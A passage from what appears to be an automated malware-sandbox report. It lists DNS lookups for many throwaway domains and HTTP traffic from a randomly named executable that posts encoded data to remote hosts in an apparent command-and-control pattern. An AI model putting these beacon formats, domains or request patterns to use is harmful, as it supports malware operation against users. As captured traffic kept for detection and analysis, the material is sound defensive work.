                                                                      Jan 13, 2025 15:14:59.729875088 CET5586453192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:15:00.726532936 CET5586453192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:15:00.815506935 CET53558641.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:15:00.815527916 CET53558641.1.1.1192.168.2.8

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 13, 2025 15:12:03.461369038 CET192.168.2.81.1.1.10x551cStandard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:20.172534943 CET192.168.2.81.1.1.10x9415Standard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:33.340827942 CET192.168.2.81.1.1.10x71dfStandard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:46.706490040 CET192.168.2.81.1.1.10x28deStandard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.711532116 CET192.168.2.81.1.1.10x28deStandard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:01.366530895 CET192.168.2.81.1.1.10xad25Standard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:14.746551037 CET192.168.2.81.1.1.10x4b42Standard query (0)www.investshares.netA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:28.436672926 CET192.168.2.81.1.1.10xbc1Standard query (0)www.nosolofichas.onlineA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:41.639211893 CET192.168.2.81.1.1.10x63b1Standard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:56.089234114 CET192.168.2.81.1.1.10xb2afStandard query (0)www.adadev.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:10.605761051 CET192.168.2.81.1.1.10x8dadStandard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:23.826980114 CET192.168.2.81.1.1.10x881cStandard query (0)www.ebsmadrid.storeA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:31.903501987 CET192.168.2.81.1.1.10x1974Standard query (0)www.denture-prices.clickA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:45.184844971 CET192.168.2.81.1.1.10xfee9Standard query (0)www.sonixingenuine.shopA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:59.729875088 CET192.168.2.81.1.1.10xce36Standard query (0)www.moyu19.proA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:15:00.726532936 CET192.168.2.81.1.1.10xce36Standard query (0)www.moyu19.proA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 13, 2025 15:12:03.479203939 CET1.1.1.1192.168.2.80x551cNo error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:20.227602959 CET1.1.1.1192.168.2.80x9415No error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:20.227602959 CET1.1.1.1192.168.2.80x9415No error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:33.355993032 CET1.1.1.1192.168.2.80x71dfNo error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:33.355993032 CET1.1.1.1192.168.2.80x71dfNo error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743535995 CET1.1.1.1192.168.2.80x28deNo error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743535995 CET1.1.1.1192.168.2.80x28deNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743535995 CET1.1.1.1192.168.2.80x28deNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743561029 CET1.1.1.1192.168.2.80x28deNo error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743561029 CET1.1.1.1192.168.2.80x28deNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:12:47.743561029 CET1.1.1.1192.168.2.80x28deNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:01.381269932 CET1.1.1.1192.168.2.80xad25No error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:15.101275921 CET1.1.1.1192.168.2.80x4b42No error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:28.484787941 CET1.1.1.1192.168.2.80xbc1No error (0)www.nosolofichas.onlinenosolofichas.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:28.484787941 CET1.1.1.1192.168.2.80xbc1No error (0)nosolofichas.online84.32.84.32A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:42.488729000 CET1.1.1.1192.168.2.80x63b1No error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:42.488729000 CET1.1.1.1192.168.2.80x63b1No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:42.488729000 CET1.1.1.1192.168.2.80x63b1No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:13:56.107244015 CET1.1.1.1192.168.2.80xb2afNo error (0)www.adadev.info47.83.1.90A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:10.629553080 CET1.1.1.1192.168.2.80x8dadNo error (0)www.cifasnc.info188.114.96.3A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:10.629553080 CET1.1.1.1192.168.2.80x8dadNo error (0)www.cifasnc.info188.114.97.3A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:23.835834026 CET1.1.1.1192.168.2.80x881cName error (3)www.ebsmadrid.storenonenoneA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:32.023921967 CET1.1.1.1192.168.2.80x1974No error (0)www.denture-prices.click199.59.243.228A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:45.213572979 CET1.1.1.1192.168.2.80xfee9No error (0)www.sonixingenuine.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:45.213572979 CET1.1.1.1192.168.2.80xfee9No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:14:45.213572979 CET1.1.1.1192.168.2.80xfee9No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:15:00.815506935 CET1.1.1.1192.168.2.80xce36No error (0)www.moyu19.pro154.39.239.237A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 15:15:00.815527916 CET1.1.1.1192.168.2.80xce36No error (0)www.moyu19.pro154.39.239.237A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.gayhxi.info
                                                                      • www.promocao.info
                                                                      • www.grimbo.boats
                                                                      • www.44756.pizza
                                                                      • www.lonfor.website
                                                                      • www.investshares.net
                                                                      • www.nosolofichas.online
                                                                      • www.jrcov55qgcxp5fwa.top
                                                                      • www.adadev.info
                                                                      • www.cifasnc.info
                                                                      • www.denture-prices.click
                                                                      • www.sonixingenuine.shop
                                                                      • www.moyu19.pro

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.84970747.83.1.90801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:03.506777048 CET481OUTGET /k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.gayhxi.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:05.117938995 CET139INHTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:12:04 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                      Data Ascii: Request too large


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.84970984.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:20.256707907 CET740OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4d 53 75 34 69 32 52 55 75 4f 6e 54 61 5a 4e 73 42 56 79 69 43 56 76 4a 39 6b 44 59 7a 70 63 30 51 67 46 4f 51 34 3d
                                                                      Data Ascii: 60q4=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvMSu4i2RUuOnTaZNsBVyiCVvJ9kDYzpc0QgFOQ4=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.84971084.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:22.798211098 CET760OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 39 45 4a 2b 4d 31 64 45 30 30 75 7a 77 31 51 48 76 64 36 4e 51 76 4b 31 4b 6a 35 62 34 4d 5a 4a 71 35 54 7a 79 56
                                                                      Data Ascii: 60q4=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC9EJ+M1dE00uzw1QHvd6NQvK1Kj5b4MZJq5TzyV


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.84971184.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:25.341511965 CET1777OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 2b 42 55 5a 35 59 74 79 46 44 79 44 70 59 50 76 4d 64 64 32 41 79 77 68 77 54 62 58 44 63 36 34 30 69 46 6e 79 52 7a 36 31 36 47 74 69 4d 56 6b 36 5a 39 71 67 43 59 54 71 6b 49 6d 39 61 51 71 43 4f 30 57 69 55 6d 33 63 76 59 48 6a 51 46 2f 70 73 30 38 69 4e 7a 4c 58 30 7a 44 58 55 68 56 6a 70 4a 37 74 77 34 32 45 52 35 57 36 63 64 62 2f 56 30 45 38 35 52 71 78 74 32 4f 30 52 34 4d 49 4d 38 48 35 7a 6b 32 32 37 53 32 46 61 53 5a 70 75 56 56 56 58 2f 47 75 6e 71 5a 6c 31 51 43 72 4e 74 [TRUNCATED]
                                                                      Data Ascii: 60q4=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd++BUZ5YtyFDyDpYPvMdd2AywhwTbXDc640iFnyRz616GtiMVk6Z9qgCYTqkIm9aQqCO0WiUm3cvYHjQF/ps08iNzLX0zDXUhVjpJ7tw42ER5W6cdb/V0E85Rqxt2O0R4MIM8H5zk227S2FaSZpuVVVX/GunqZl1QCrNt+tSJvlYuV6sFx2XJrGI0dKpWdtmmNXl/YcAyOu1Ozh7WqUF4nL+sXBWxpNdcZbB7bV63sXEc72IjwtDOoQBb7/Fw3LBcJkHTspJ07h4e0d2AfzkaH12FuSLv4/RRZL5cBBMsmZ2TzY8ezbrU6FBPQjYMPyi5hrMvo+1EaPRHliANh/4cN9NWTX9x2JCfu4aUp07z6x+T0u5p/B9wnuEuevRPwjtI2vEP+7ndVAZKpqj0wIq3Ieipt7+Rgp+IIo+8gnbIImjbdFuyd4agdW8r1Q6D193qEWx8In6DKcvO+OeVNGLxvXy52f6WgqOJafwJ3JFUW1AKM6bNoffNxr9jzSA8srBuZvFRx2uL58GON4NWgJpeEokY03IANJrVmKa/Br3ZvvV8xiXtyyK+Wcqq+oXv4oYl+mPCwUGXzE4dArTZHbwf8PNsXnsS3vW3HIPYoc7MWijHOnSUg2KAVHWXyg643gGeml4FBLLjzvcrB8HcMjjsgKFVrPf7IQGXdNq9J1tT4EO/Bxb2vStI90nL3JVe6zhFTkt48IZfnXIxiFKBqO1odl6NRE4ifNPFxnVE/XSwBMR81B835mMvqSnAJ5fxMdGPmEsk1oTMHq+6SVpaMrRPMuKKQs0VaKtaFdfMKtKlj2AZzXAcnggTQEguOXaKf4yjQ9M85A [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.84971384.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:27.884059906 CET483OUTGET /zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.promocao.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:28.331995010 CET1236INHTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 14:12:28 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: c06013ba456b92f12bedf7b1c7183ad9-bos-edge2
                                                                      Expires: Mon, 13 Jan 2025 14:12:27 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                      Jan 13, 2025 15:12:28.332014084 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                      Jan 13, 2025 15:12:28.332024097 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                      Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                      Jan 13, 2025 15:12:28.332036018 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                      Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                      Jan 13, 2025 15:12:28.332047939 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                      Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                      Jan 13, 2025 15:12:28.332058907 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                      Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                      Jan 13, 2025 15:12:28.332068920 CET776INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                      Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                      Jan 13, 2025 15:12:28.332078934 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                      Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                      Jan 13, 2025 15:12:28.332089901 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                      Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.849714104.21.18.171801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:33.381563902 CET737OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
